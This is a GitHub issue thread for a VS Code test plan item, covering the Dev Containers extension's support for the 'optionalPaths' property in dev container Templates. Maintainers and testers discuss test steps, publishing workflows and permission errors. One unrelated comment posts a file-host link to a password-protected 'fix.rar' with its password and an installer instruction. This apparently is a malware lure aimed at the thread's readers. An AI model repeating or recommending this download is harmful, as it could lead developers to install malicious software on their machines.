### ISSUE TITLE
Test: Ignoring paths in dev container Templates

### ISSUE THREAD

**Issue by joshspicer** [microsoft/vscode#226686]
Refs: https://github.com/microsoft/vscode-remote-release/issues/10095 , https://github.com/devcontainers/spec/pull/484

- [x] macOS @eleanorjboyd
- [x] linux @alexr00
- [x] windows @bamurtaugh 

Complexity: ~~2~~ 4

[Create Issue](https://github.com/microsoft/vscode/issues/new?body=Testing+%23226686%0A%0A&assignees=joshspicer)

---

## 1. Validate extension picker

The pre-release build of the `Dev Containers` extension (at least `v0.382.0 (pre-release)`) adds handling for a new [dev container Templates property called `optionalPaths`](https://github.com/devcontainers/spec/blob/45d282bcb482013e5b5d4ba0e9c24ddf80cb88d8/docs/specs/devcontainer-templates.md#the-optionalpaths-property).

Using the `Add Dev Container configuration files...` wizard as shown below, validate that any Template that defines `optionalPaths` (at least any Template published by the `devcontainers` org) operates as expected.

> Note that the quickpick wizards shows the full path `.github/dependabot.yml` even those the entire `.github` folder [is optional](https://github.com/devcontainers/templates/blob/main/src/docker-in-docker/devcontainer-template.json#L42-L44).  This is resolved at publishing time and the full path is shown for the user's convenience.

https://github.com/user-attachments/assets/dc80cb01-b818-4ae7-8a47-b732f44b418f

## 2. Validate with Templates that aren't cached as an item in the quickpick

As shown in the demo below, a string [referencing a Template hosted publicly on a registry](https://github.com/codspace/templates/pkgs/container/templates%2Fmytemplate) can be pasted into the text box and applied just as a Template that is cached. The data is resolved from the Templates manifest and that data is what is shown in the quick pick.  There are several pieces of new code that allow this to happen.

https://github.com/user-attachments/assets/70607754-7746-45a8-b620-a3b738077818

### Steps:
1. Publish your own Template using the [start code](https://github.com/devcontainers/template-starter)
2. Add more folders/files and omit some of them with the `optionalPaths` property in the `devcontainer-template.json`.
3. Run the provided GitHub action to publish the Template.
4. As shown in the video, attempt to use the Template in the extension.

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by alexr00** [comment]
Where can I see whether the template specifies `optionalPaths`?

**Comment by eleanorjboyd** [comment]
Hi! Bit confused here in how to publish my own template- from what I understand you take the starter code, write your own template that will be defined in the `devcontainer-template.json` file. Then how should I be running the workflow? Like am I pushing changes to that repo or running it locally? @joshspicer we could also sync online just wanted to ask in case anyone else had an issue. Thanks!

**Comment by alexr00** [comment]
I got an error on part 2 and I'm unable to complete it: https://github.com/alexr00/template-starter/actions/runs/10581376591/job/29318494463

Just FYI, this has felt more like a complexity 4 TPI to me 🙂.

**Comment by joshspicer** [comment]
> Where can I see whether the template specifies `optionalPaths`? @alexr00 

There are several spots - the first is the source code itself (like [here](https://github.com/devcontainers/templates/blob/main/src/docker-in-docker/devcontainer-template.json#L42-L44)).  Additionally there's a CLI command that lets you fetch the published manifest for a given Template.  Here's an example with that filters with `jq`:

![Image](https://github.com/user-attachments/assets/195449ef-5a6f-4dbb-b7c4-25a7af6581e2)


> Error on part 2 @alexr00 @eleanorjboyd 

Apologies, it appears like the template repo itself is out-of-date and is missing some workflow permissions (causing that 403).  Here's the commit that fixed it  where we host our "first party" Templates: https://github.com/devcontainers/templates/commit/71063d5a7ec286218163b7a5060c0da8944831d7.  I've put up a PR to fix that: https://github.com/devcontainers/template-starter/pull/36

> How to publish my own template

Hey there! Apologies for not adding more steps.  (After the above issue is resolved) the steps should be:

1. Create your own repo from the Template repo.
2. Make a change to one of the Templates in `./src`
3. Run the `release.yaml` GitHub action on your fork (eg: https://github.com/devcontainers/template-starter/actions/workflows/release.yaml)

Here's a successful run of that workflow for your reference:https://github.com/joshspicer/templates-2024aug27/actions/runs/10583799128/job/29326603363

**Comment by eleanorjboyd** [comment]
Thanks for the extra steps- those helped a lot! I also got a failure attempting to publish but for different reasons: `pull request create failed: GraphQL: GitHub Actions is not permitted to create or approve pull requests (createPullRequest)`. Here is my run: https://github.com/eleanorjboyd/tpi-template-dev/actions/runs/10584559551/job/29329081975. Not sure if it is just something about my account I have setup wrong. Thanks!

**Comment by joshspicer** [comment]
@eleanorjboyd thanks for retrying!  Is this setting enabled for you in the repo's settings? It was automatically enabled for me, but perhaps that preference is sticky to new repos once it's enabled once?



![Image](https://github.com/user-attachments/assets/5ced322b-e1dc-4874-a305-d133dfbdfa39)



(It's in the [readme](https://github.com/devcontainers/template-starter?tab=readme-ov-file#distributing-templates) too but admittedly easy to miss.  I also presumed the `pull-requests: write` permission would've helped, but guess not 🤷 )
